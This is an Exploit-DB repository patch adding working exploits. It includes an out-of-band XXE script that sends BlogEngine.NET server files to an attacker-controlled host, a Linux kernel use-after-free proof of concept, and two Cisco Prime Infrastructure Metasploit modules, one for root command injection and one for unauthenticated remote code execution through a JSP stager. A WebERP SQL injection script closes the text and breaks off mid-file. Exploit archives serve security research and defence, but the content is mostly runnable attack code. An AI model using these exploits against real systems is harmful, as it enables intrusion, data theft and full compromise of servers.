From 3ef90f18d01e388b72bab0795130a6414f21a1d1 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 21 Jun 2019 05:01:58 +0000
Subject: [PATCH] DB: 2019-06-21

6 changes to exploits/shellcodes

Linux - Use-After-Free via race Between modify_ldt() and #BR Exception
Tuneclone 2.20 - Local SEH Buffer Overflow
Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)

Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)
WebERP 4.15 - SQL injection
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection
---
 exploits/aspx/webapps/47014.py  | 190 +++++++++++++++++++++++++++
 exploits/linux/dos/47015.c      | 224 ++++++++++++++++++++++++++++++++
 exploits/linux/local/47017.rb   |  69 ++++++++++
 exploits/linux/remote/47016.rb  | 202 ++++++++++++++++++++++++++++
 exploits/php/webapps/47013.py   |  92 +++++++++++++
 exploits/windows/local/47012.py |  65 +++++++++
 files_exploits.csv              |   6 +
 7 files changed, 848 insertions(+)
 create mode 100755 exploits/aspx/webapps/47014.py
 create mode 100644 exploits/linux/dos/47015.c
 create mode 100755 exploits/linux/local/47017.rb
 create mode 100755 exploits/linux/remote/47016.rb
 create mode 100755 exploits/php/webapps/47013.py
 create mode 100755 exploits/windows/local/47012.py

diff --git a/exploits/aspx/webapps/47014.py b/exploits/aspx/webapps/47014.py
new file mode 100755
index 000000000..63ae17805
--- /dev/null
+++ b/exploits/aspx/webapps/47014.py
@@ -0,0 +1,190 @@
+# Exploit Title: Out-of-band XML External Entity Injection on BlogEngine.NET
+# Date: 19 June 2019
+# Exploit Author: Aaron Bishop
+# Vendor Homepage: https://blogengine.io/
+# Version: v3.3.7
+# Tested on: 3.3.7, 3.3.6
+# CVE : 2019-10718
+
+#1. Description
+#==============
+
+#BlogEngine.NET is vulnerable to an Out-of-Band XML External Entity
+#Injection attack on **/pingback.axd**.
+
+#2. Proof of Concept
+#=============
+
+#Host the following malicious DTD on a web server that is accessible to the
+#target system:
+
+#~~~
+#<!ENTITY % p1 SYSTEM "file:///C:/Windows/win.ini">
+#<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://$LHOST/X?%p1;'>"> %p2
+#~~~
+
+#Submit a request to `pingback.axd` containing a malicious XML body:
+
+#~~~{command="REQUEST"}
+#POST /pingback.axd HTTP/1.1
+#Host: $RHOST
+#Accept-Encoding: gzip, deflate
+#Connection: close
+#User-Agent: python-requests/2.12.4
+#Accept: */*
+#Content-Type: text/xml
+#Content-Length: 131
+
+#<?xml version="1.0"?>
+#<!DOCTYPE foo SYSTEM "http://$LHOST/ex.dtd">
+#<foo>&e1;</foo>
+#<methodName>pingback.ping</methodName>
+#~~~
+
+#The application will request the remote DTD and submit a subsequent request
+#containing the contents of the file:
+
+#~~~
+#$RHOST - - [17/May/2019 12:03:32] "GET /ex.dtd HTTP/1.1" 200 -
+#$RHOST - - [17/May/2019 12:03:32] "GET
+#/X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1
+#HTTP/1.1" 200 -
+#~~~
+
+#! /usr/bin/env python3
+import argparse
+import http.server
+import json
+import multiprocessing
+import os
+import re
+import requests
+import sys
+import time
+import urllib
+
+"""
+Exploit for CVE-2019-10718
+
+CVE Identified by: Aaron Bishop
+Exploit written by: Aaron Bishop
+
+Submit a XML to the target, get the contents of the file in a follow up request from the target
+
+python3 CVE-2019-10718.py --rhost http://$RHOST --lhost $LHOST --lport $LPORT --files C:/Windows/win.ini C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config C:/inetpub/wwwroot/iisstart.htm C:/Windows/iis.log C:/Users/Public/test.txt
+
+Requesting C:/Windows/win.ini ...
+$RHOST - - [16/May/2019 17:07:25] "GET /ex.dtd HTTP/1.1" 200 -
+$RHOST - - [16/May/2019 17:07:25] "GET /X?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1 HTTP/1.1" 200 -
+
+Requesting C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config ...
+$RHOST - - [16/May/2019 17:07:26] "GET /ex.dtd HTTP/1.1" 200 -
+Unable to read C:/Users/Administrator/source/repos/BlogEngine.NET/BlogEngine/web.config
+
+Requesting C:/inetpub/wwwroot/iisstart.htm ...
+$RHOST - - [16/May/2019 17:07:30] "GET /ex.dtd HTTP/1.1" 200 -
+Unable to read C:/inetpub/wwwroot/iisstart.htm
+
+Requesting C:/Windows/iis.log ...
+$RHOST - - [16/May/2019 17:07:34] "GET /ex.dtd HTTP/1.1" 200 -
+Unable to read C:/Windows/iis.log
+
+Requesting C:/Users/Public/test.txt ...
+$RHOST - - [16/May/2019 17:07:38] "GET /ex.dtd HTTP/1.1" 200 -
+$RHOST - - [16/May/2019 17:07:38] "GET /X?This%20is%20a%20test HTTP/1.1" 200 -
+
+"""
+
+xml = """<?xml version="1.0"?>
+<!DOCTYPE foo SYSTEM "http://{lhost}:{lport}/ex.dtd">
+<foo>&e1;</foo>
+<methodName>pingback.ping</methodName>
+"""
+
+dtd = """<!ENTITY % p1 SYSTEM "file:///{fname}">
+<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://{lhost}:{lport}/X?%p1;'>"> %p2;
+"""
+
+proxies = {
+            "http": "127.0.0.1:8080",
+            "https": "127.0.0.1:8080"
+          }
+
+file_queue = multiprocessing.Queue()
+response_queue = multiprocessing.Queue()
+response_counter = multiprocessing.Value('i', 0)
+
+class S(http.server.SimpleHTTPRequestHandler):
+    server_version = 'A Patchey Webserver'
+    sys_version = '3.1415926535897932384626433832795028841971693993751058209749445923078'
+    error_message_format = 'Donde esta la biblioteca?'
+
+    def _set_headers(self):
+            self.send_response(200)
+            self.send_header('Content-Type', 'application/xml')
+            self.end_headers()
+
+    def do_GET(self):
+        if self.path.endswith(".dtd"):
+            self._set_headers()
+            self.wfile.write(dtd.format(fname=file_queue.get(), lhost=self.lhost, lport=self.lport).encode('utf-8'))
+        elif self.path.startswith("/X"):
+            self._set_headers()
+            response_counter.value += 1
+            response_queue.put(self.path)
+            self.wfile.write('<response>Thanks</response>'.encode('utf-8'))
+        else:
+            self._set_headers()
+            self.wfile.write('<error>?</error>')
+
+
+def start_server(lhost, lport, server):
+    httpd = http.server.HTTPServer((lhost, lport), server)
+    httpd.serve_forever()
+
+def main(rhost, lhost, lport, files, timeout, proxy, output_dir):
+    print(output_dir)
+    if not output_dir:
+        return
+    for f in files:
+        file_queue.put_nowait(f)
+
+    server = S
+    server.lhost, server.lport = lhost, lport
+    p = multiprocessing.Process(target=start_server, args=(lhost,lport,server))
+    p.start()
+    for num, f in enumerate(files):
+        print("\nRequesting {} ...".format(f))
+        count = 0
+        r = requests.post(rhost + "/pingback.axd", data=xml.format(lhost=lhost, lport=lport), proxies=proxies if proxy else {}, headers={"Content-Type": "text/xml"})
+        response = True
+        while num == response_counter.value:
+            if count >= timeout:
+                response = False
+                response_counter.value += 1
+                print("Unable to read {}".format(f))
+                break
+            time.sleep(1)
+            count += 1
+        if response:
+            os.makedirs(output_dir, exist_ok=True)
+            with open("{}/{}".format(output_dir, os.path.splitdrive(f)[1].replace(':','').replace('/','_')), 'w') as fh:
+                fh.write(urllib.parse.unquote(response_queue.get()).replace('/X?',''))
+
+    p.terminate()
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Exploit CVE-2019-10718 OOB XXE')
+    parser.add_argument('-r', '--rhost', action="store", dest="rhost", required=True, help='Target host')
+    parser.add_argument('-l', '--lhost', action="store", dest="lhost", required=True, help='Local host')
+    parser.add_argument('-p', '--lport', action="store", dest="lport", type=int, required=True, help='Local port')
+    parser.add_argument('-f', '--files', nargs='+', default="C:/Windows/win.ini", help='Files to read on RHOST')
+    parser.add_argument('-t', '--timeout', type=int, default=3, help='How long to wait before moving on to next file')
+    parser.add_argument('-x', '--proxy', dest="proxy", action="store_true", default=False, help='Pass requests through a proxy')
+    parser.add_argument('-o', '--output', nargs='?', default="./CVE-2019-10718", help='Output directory.  Default ./CVE-2019-10718')
+    args = parser.parse_args()
+
+    if isinstance(args.files, str):
+        args.files = [args.files]
+    main(args.rhost, args.lhost, args.lport, args.files, args.timeout, args.proxy, args.output)
\ No newline at end of file
diff --git a/exploits/linux/dos/47015.c b/exploits/linux/dos/47015.c
new file mode 100644
index 000000000..4ddb55d8d
--- /dev/null
+++ b/exploits/linux/dos/47015.c
@@ -0,0 +1,224 @@
+/*
+When a #BR exception is raised because of an MPX bounds violation, Linux parses
+the faulting instruction and computes the linear address of its memory operand.
+If the userspace instruction is in 32-bit code, this involves looking up the
+correct segment descriptor and adding the segment offset to the address.
+
+(Another codepath that computes the linear address of an instruction is UMIP,
+but I think that requires processors >= Cannon Lake, and my PC isn't that new.)
+
+get_desc() locks the mm context, computes the pointer to the LDT entry, but then
+drops the lock again and returns the pointer. This means that when the caller
+actually accesses the pointer, the pointer may have been freed already.
+
+This bug was introduced in
+<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=670f928ba09b>
+("x86/insn-eval: Add utility function to get segment descriptor", first in 4.15).
+
+
+To make this easier to hit, I patched a sleep into my kernel:
+
+
+================
+diff --git a/arch/x86/lib/insn-eval.c b/arch/x86/lib/insn-eval.c
+index cf00ab6c66210..5d9c59a28c76f 100644
+--- a/arch/x86/lib/insn-eval.c
++++ b/arch/x86/lib/insn-eval.c
+@@ -7,6 +7,7 @@
+ #include <linux/string.h>
+ #include <linux/ratelimit.h>
+ #include <linux/mmu_context.h>
++#include <linux/delay.h>
+ #include <asm/desc_defs.h>
+ #include <asm/desc.h>
+ #include <asm/inat.h>
+@@ -670,6 +671,8 @@ unsigned long insn_get_seg_base(struct pt_regs *regs, int seg_reg_idx)
+        if (!desc)
+                return -1L;
+ 
++       mdelay(1000);
++
+        return get_desc_base(desc);
+ }
+================
+
+I also built the kernel with KASAN and full preemption.
+
+
+Then I ran the following test program, compiled with
+"gcc -m32 -mmpx -fcheck-pointer-bounds -o mpx mpx.c -pthread":
+
+===============
+*/
+
+#define _GNU_SOURCE
+#include <ucontext.h>
+#include <stdio.h>
+#include <signal.h>
+#include <setjmp.h>
+#include <sys/prctl.h>
+#include <err.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <asm/ldt.h>
+#include <pthread.h>
+
+unsigned long blah;
+
+void post_bounds_label(void);
+
+static void do_ldt(void) {
+  struct user_desc desc = {
+    .entry_number = 0,
+    .base_addr = (unsigned long)&blah,
+    .limit = 0xffffffff,
+    .seg_32bit = 1,
+    .contents = 0,
+    .useable = 1
+  };
+  if (syscall(__NR_modify_ldt, 0x11, &desc, sizeof(desc)))
+    err(1, "modify_ldt");
+}
+
+void *ldt_thread(void *dummy) {
+  while (1) do_ldt();
+}
+
+jmp_buf jumpy;
+void handle_segv(int sig, siginfo_t *info, void *uctx_) {
+  if (info->si_addr != &blah) {
+    printf("addr=%p\n", info->si_addr);
+  }
+  ucontext_t *uctx = uctx_;
+  uctx->uc_mcontext.gregs[REG_EIP] = (unsigned long)post_bounds_label;
+}
+
+int main(void) {
+  do_ldt();
+  pthread_t thread;
+  if (pthread_create(&thread, NULL, ldt_thread, NULL)) err(1, "pthread create");
+
+  struct sigaction act = {
+    .sa_sigaction = handle_segv,
+    .sa_flags = SA_NODEFER|SA_SIGINFO
+  };
+  if (sigaction(SIGSEGV, &act, NULL)) err(1, "sigaction");
+
+  while (1) {
+    unsigned long mpx_bounds[2] = { 5, 6 };
+    unsigned long old_bounds[2];
+    asm volatile(
+      "bndmov %%bnd0, (%0)\n"
+      "bndmov (%2), %%bnd0\n"
+      "mov %1, %%fs\n"
+      "bndcl %%fs:(%3), %%bnd0\n"
+      "bndcn %%fs:(%3), %%bnd0\n"
+      "post_bounds_label:\n"
+      "bndmov (%0), %%bnd0\n"
+    : /*out*/
+    : /*in*/
+      "r"(old_bounds),
+      "r"(0x7),
+      "r"(mpx_bounds),
+      "r"(0x0UL)
+    );
+  }
+}
+/*
+jannh@laptop:~/mpx$ 
+===============
+
+The program started printing various hex numbers, and I immediately got this
+KASAN splat:
+
+===============
+[ 3129.003397] ==================================================================
+[ 3129.003411] BUG: KASAN: use-after-free in insn_get_seg_base+0x9a/0x110
+[ 3129.003416] Read of size 2 at addr ffff8883775da002 by task mpx/13947
+
+[ 3129.003425] CPU: 1 PID: 13947 Comm: mpx Not tainted 5.2.0-rc2+ #10
+[ 3129.003427] Hardware name: [...]
+[ 3129.003429] Call Trace:
+[ 3129.003436]  dump_stack+0x71/0xab
+[ 3129.003441]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003446]  print_address_description+0x6a/0x250
+[ 3129.003450]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003454]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003458]  __kasan_report+0x14e/0x192
+[ 3129.003463]  ? insn_get_seg_base+0x9a/0x110
+[ 3129.003467]  kasan_report+0xe/0x20
+[ 3129.003471]  insn_get_seg_base+0x9a/0x110
+[ 3129.003476]  get_seg_base_limit+0x181/0x4a0
+[ 3129.003482]  insn_get_addr_ref+0x18f/0x490
+[ 3129.003486]  ? insn_get_opcode.part.4+0x16d/0x350
+[ 3129.003490]  ? insn_get_modrm_rm_off+0x60/0x60
+[ 3129.003496]  ? insn_get_modrm.part.5+0xce/0x220
+[ 3129.003501]  ? insn_get_sib.part.6+0x60/0xc0
+[ 3129.003505]  ? insn_get_displacement.part.7+0xe3/0x1d0
+[ 3129.003509]  ? insn_get_immediate.part.8+0x52/0x710
+[ 3129.003514]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003517]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003523]  mpx_fault_info+0x1bc/0x2d0
+[ 3129.003528]  ? trace_event_raw_event_bounds_exception_mpx+0x170/0x170
+[ 3129.003535]  ? notify_die+0x7d/0xc0
+[ 3129.003539]  ? atomic_notifier_call_chain+0x40/0x40
+[ 3129.003543]  ? __ia32_sys_rt_sigaction+0x1c0/0x1c0
+[ 3129.003547]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003550]  ? preempt_count_sub+0x14/0xc0
+[ 3129.003556]  do_bounds+0x24d/0x350
+[ 3129.003560]  ? do_double_fault+0x160/0x160
+[ 3129.003565]  ? fpregs_assert_state_consistent+0x54/0x70
+[ 3129.003570]  ? bounds+0xa/0x20
+[ 3129.003574]  bounds+0x14/0x20
+[ 3129.003578] RIP: 0023:0x565e98e7
+[ 3129.003583] Code: c7 85 64 ff ff ff 06 00 00 00 8d 85 58 ff ff ff b9 07 00 00 00 8d 95 60 ff ff ff bb 00 00 00 00 66 0f 1b 00 66 0f 1a 02 8e e1 <64> f3 0f 1a 03 64 f2 0f 1b 03 66 0f 1a 00 f2 e9 7c ff ff ff 55 89
+[ 3129.003585] RSP: 002b:00000000ffdca1f0 EFLAGS: 00010286
+[ 3129.003588] RAX: 00000000ffdca230 RBX: 0000000000000000 RCX: 0000000000000007
+[ 3129.003591] RDX: 00000000ffdca238 RSI: 0000000000000001 RDI: 00000000ffdca2cc
+[ 3129.003593] RBP: 00000000ffdca2d8 R08: 0000000000000000 R09: 0000000000000000
+[ 3129.003595] R10: 0000000000000000 R11: 0000000000000286 R12: 0000000000000000
+[ 3129.003597] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
+
+[ 3129.003606] Allocated by task 13948:
+[ 3129.003611]  save_stack+0x19/0x80
+[ 3129.003615]  __kasan_kmalloc.constprop.8+0xa0/0xd0
+[ 3129.003618]  kmem_cache_alloc_trace+0xcc/0x5d0
+[ 3129.003622]  alloc_ldt_struct+0x39/0xc0
+[ 3129.003625]  write_ldt+0x236/0x5d0
+[ 3129.003628]  __ia32_sys_modify_ldt+0x50/0xc0
+[ 3129.003632]  do_fast_syscall_32+0x112/0x390
+[ 3129.003635]  entry_SYSENTER_compat+0x7f/0x91
+
+[ 3129.003639] Freed by task 13948:
+[ 3129.003644]  save_stack+0x19/0x80
+[ 3129.003647]  __kasan_slab_free+0x105/0x150
+[ 3129.003650]  kfree+0x82/0x120
+[ 3129.003653]  write_ldt+0x519/0x5d0
+[ 3129.003656]  __ia32_sys_modify_ldt+0x50/0xc0
+[ 3129.003659]  do_fast_syscall_32+0x112/0x390
+[ 3129.003664]  entry_SYSENTER_compat+0x7f/0x91
+
+[ 3129.003669] The buggy address belongs to the object at ffff8883775da000
+                which belongs to the cache kmalloc-32 of size 32
+[ 3129.003674] The buggy address is located 2 bytes inside of
+                32-byte region [ffff8883775da000, ffff8883775da020)
+[ 3129.003677] The buggy address belongs to the page:
+[ 3129.003683] page:ffffea000ddd7680 refcount:1 mapcount:0 mapping:ffff8883d0c00180 index:0xffff8883775dafc1
+[ 3129.003686] flags: 0x17fffc000000200(slab)
+[ 3129.003692] raw: 017fffc000000200 ffffea000f0692c8 ffffea000d4bb988 ffff8883d0c00180
+[ 3129.003696] raw: ffff8883775dafc1 ffff8883775da000 000000010000003f 0000000000000000
+[ 3129.003698] page dumped because: kasan: bad access detected
+
+[ 3129.003701] Memory state around the buggy address:
+[ 3129.003706]  ffff8883775d9f00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 3129.003711]  ffff8883775d9f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 3129.003715] >ffff8883775da000: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
+[ 3129.003718]                    ^
+[ 3129.003723]  ffff8883775da080: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
+[ 3129.003727]  ffff8883775da100: fb fb fb fb fc fc fc fc fb fb fb fb fc fc fc fc
+[ 3129.003730] ==================================================================
+[ 3129.003733] Disabling lock debugging due to kernel taint
+===============
+
+I'll send a suggested patch ("[PATCH] x86/insn-eval: Fix use-after-free access to LDT entry") in a minute.
+*/
\ No newline at end of file
diff --git a/exploits/linux/local/47017.rb b/exploits/linux/local/47017.rb
new file mode 100755
index 000000000..a491d27f9
--- /dev/null
+++ b/exploits/linux/local/47017.rb
@@ -0,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super( update_info( info,
+      'Name'           => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',
+      'Description'    => %q{
+        This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The
+        runrshell binary is meant to execute a shell script as root, but can be abused to inject
+        extra commands in the argument, allowing you to execute anything as root.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery
+          'sinn3r'                               # Metasploit module
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DisclosureDate' => '2018-12-08',
+      'Privileged'     => true,
+      'References'     =>
+        [
+          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],
+        ],
+      'Targets'        =>
+        [
+          [ 'Cisco Prime Infrastructure 3.4.0', {} ]
+        ],
+      'DefaultTarget'  => 0
+     ))
+
+    register_advanced_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])
+    ]
+  end
+
+  def exec_as_root(cmd)
+    command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'"
+    vprint_status(cmd_exec(command_string))
+  end
+
+  def exploit
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"
+    exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)
+    print_status("Uploading #{exe_path}")
+    write_file(exe_path, generate_payload_exe)
+    unless file?(exe_path)
+      print_error("Failed to upload #{exe_path}")
+      return
+    end
+
+    register_file_for_cleanup(exe_path)
+    print_status('chmod the file with +x')
+    exec_as_root("/bin/chmod +x #{exe_path}")
+    print_status("Executing #{exe_path}")
+    exec_as_root(exe_path)
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47016.rb b/exploits/linux/remote/47016.rb
new file mode 100755
index 000000000..eff57afd1
--- /dev/null
+++ b/exploits/linux/remote/47016.rb
@@ -0,0 +1,202 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that
+        the TarArchive Java class the HA Health Monitor component uses does not check for any
+        directory traversals while unpacking a Tar file, which can be abused by a remote user to
+        leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps
+        directory, and gain arbitrary remote code execution. Note that authentication is not
+        required to exploit this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Steven Seeley', # Original discovery, PoC
+          'sinn3r'         # Metasploit module
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_X86,
+      'Targets'        =>
+        [
+          [ 'Cisco Prime Infrastructure 3.4.0.0', { } ]
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-1821'],
+          ['URL', 'https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce'],
+          ['URL', 'https://srcincite.io/advisories/src-2019-0034/'],
+          ['URL', 'https://srcincite.io/pocs/src-2019-0034.py.txt']
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8082,
+          'SSL'   => true,
+
+        },
+      'Notes'          =>
+        {
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'May 15 2019',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptPort.new('WEBPORT', [true, 'Cisco Prime Infrastructure web interface', 443]),
+        OptString.new('TARGETURI', [true, 'The route for Cisco Prime Infrastructure web interface', '/'])
+      ])
+  end
+
+  class CPITarArchive
+    attr_reader :data
+    attr_reader :jsp_name
+    attr_reader :tar_name
+    attr_reader :stager
+    attr_reader :length
+
+    def initialize(name, stager)
+      @jsp_name = "#{name}.jsp"
+      @tar_name = "#{name}.tar"
+      @stager = stager
+      @data = make
+      @length = data.length
+    end
+
+    def make
+      data = ''
+      path = "../../opt/CSCOlumos/tomcat/webapps/ROOT/#{jsp_name}"
+      tar = StringIO.new
+      Rex::Tar::Writer.new(tar) do |t|
+        t.add_file(path, 0644) do |f|
+          f.write(stager)
+        end
+      end
+      tar.seek(0)
+      data = tar.read
+      tar.close
+      data
+    end
+  end
+
+  def check
+    res = send_request_cgi({
+      'rport'  => datastore['WEBPORT'],
+      'SSL'    => true,
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, 'webacs', 'pages', 'common', 'login.jsp')
+    })
+
+    unless res
+      vprint_error('No response from the server')
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.headers['Server'] && res.headers['Server'] == 'Prime'
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def get_jsp_stager(out_file, bin_data)
+    # For some reason, some of the bytes tend to get lost at the end.
+    # Not really sure why, but some extra bytes are added to ensure the integrity
+    # of the code. This file will get deleted during cleanup anyway.
+    %Q|<%@ page import="java.io.*" %>
+    <%
+      String data = "#{Rex::Text.to_hex(bin_data, '')}";
+      FileOutputStream outputstream = new FileOutputStream("#{out_file}");
+      int numbytes = data.length();
+      byte[] bytes = new byte[numbytes/2];
+      for (int counter = 0; counter < numbytes; counter += 2)
+      {
+        char char1 = (char) data.charAt(counter);
+        char char2 = (char) data.charAt(counter + 1);
+        int comb = Character.digit(char1, 16) & 0xff;
+        comb <<= 4;
+        comb += Character.digit(char2, 16) & 0xff;
+        bytes[counter/2] = (byte)comb;
+      }
+      outputstream.write(bytes);
+      outputstream.close();
+      try {
+        Runtime.getRuntime().exec("chmod +x #{out_file}");
+        Runtime.getRuntime().exec("#{out_file}");
+      } catch (IOException exp) {}
+    %>#{Rex::Text.rand_text_alpha(30)}|
+  end
+
+  def make_tar
+    elf_name = "/tmp/#{Rex::Text.rand_text_alpha(10)}.bin"
+    register_file_for_cleanup(elf_name)
+    elf = generate_payload_exe(code: payload.encoded)
+    jsp_stager = get_jsp_stager(elf_name, elf)
+    tar_name = Rex::Text.rand_text_alpha(10)
+    register_file_for_cleanup("apache-tomcat-8.5.16/webapps/ROOT/#{tar_name}.jsp")
+    CPITarArchive.new(tar_name, jsp_stager)
+  end
+
+  def execute_payload(tar)
+    # Once executed, we are at:
+    # /opt/CSCOlumos
+    send_request_cgi({
+      'rport'  => datastore['WEBPORT'],
+      'SSL'    => true,
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, tar.jsp_name)
+    })
+  end
+
+  def upload_tar(tar)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(tar.data, nil, nil, "form-data; name=\"files\"; filename=\"#{tar.tar_name}\"")
+
+    # The file gets uploaded to this path on the server:
+    # /opt/CSCOlumos/apache-tomcat-8.5.16/webapps/ROOT/tar_name.jsp
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'servlet', 'UploadServlet'),
+      'data'   => post_data.to_s,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' =>
+        {
+          'Destination-Dir' => 'tftpRoot',
+          'Compressed-Archive' => 'false',
+          'Primary-IP' => '127.0.0.1',
+          'Filecount' => '1',
+          'Filename' => tar.tar_name,
+          'FileSize' => tar.length
+        }
+    })
+
+    (res && res.code == 200)
+  end
+
+  def exploit
+    tar = make_tar
+    print_status("Uploading tar file (#{tar.length} bytes)")
+    if upload_tar(tar)
+      print_status('Executing JSP stager...')
+      execute_payload(tar)
+    else
+      print_status("Failed to upload #{tar.tar_name}")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47013.py b/exploits/php/webapps/47013.py
new file mode 100755
index 000000000..3d3638d0c
--- /dev/null
+++ b/exploits/php/webapps/47013.py
@@ -0,0 +1,92 @@
+# Exploit Title: Blind SQL injection in WebERP.
+# Date: June 10, 2019
+# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
+# Vendor Homepage: http://www.weberp.org/
+# Version: 4.15
+
+# A malicious query can be sent in base64 encoding to unserialize() function. It can be deserialized as an array without any sanitization then. 
+# After it, each element of the array is passed directly to the SQL query. 
+
+import requests
+import base64
+import os
+import subprocess
+from bs4 import BeautifulSoup
+import re
+import time
+import sys
+
+def generatePayload(PaidAmount="0",PaymentId="0"):
+    #THIS FUNCTION IS INSECURE BY DESIGN
+    ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount)
+    return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read()
+
+def getCookies(ip, CompanyNameField, usr, pwd):
+    r = requests.get("http://" + ip + "/index.php")
+    s = BeautifulSoup(r.text, 'lxml')
+    m = re.search("FormID.*>", r.text)
+    FormID = m.group(0).split("\"")[2]
+    
+    data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"}
+    r = requests.post("http://" + ip + "/index.php", data)
+    
+    return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]}
+    
+
+def addSupplierID(name, cookies, proxies):
+    r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies)
+    s = BeautifulSoup(r.text, 'lxml')
+    m = re.search("FormID.*>", r.text)
+    FormID = m.group(0).split("\"")[2]
+    
+    data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019","BankPartics":"","BankRef":"0",
+            "PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD","Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"}
+            
+    requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies)
+
+
+def runExploit(cookies, supplier_id, payload, proxies):
+    r = requests.get("http://" + ip + "/Payments.php", cookies=cookies)
+    s = BeautifulSoup(r.text, 'lxml')
+    m = re.search("FormID.*>", r.text)
+    FormID = m.group(0).split("\"")[2]
+    
+    data = {"FormID":FormID,
+            "CommitBatch":"2",
+            "BankAccount":"1",
+            "DatePaid":"01/06/2019",
+            "PaidArray":payload}
+         
+    requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies)
+
+
+if __name__ == "__main__":
+    #proxies = {'http':'127.0.0.1:8080'}
+    proxies = {}
+    
+    if len(sys.argv) != 6:
+        print '(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0]
+        print '(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0]
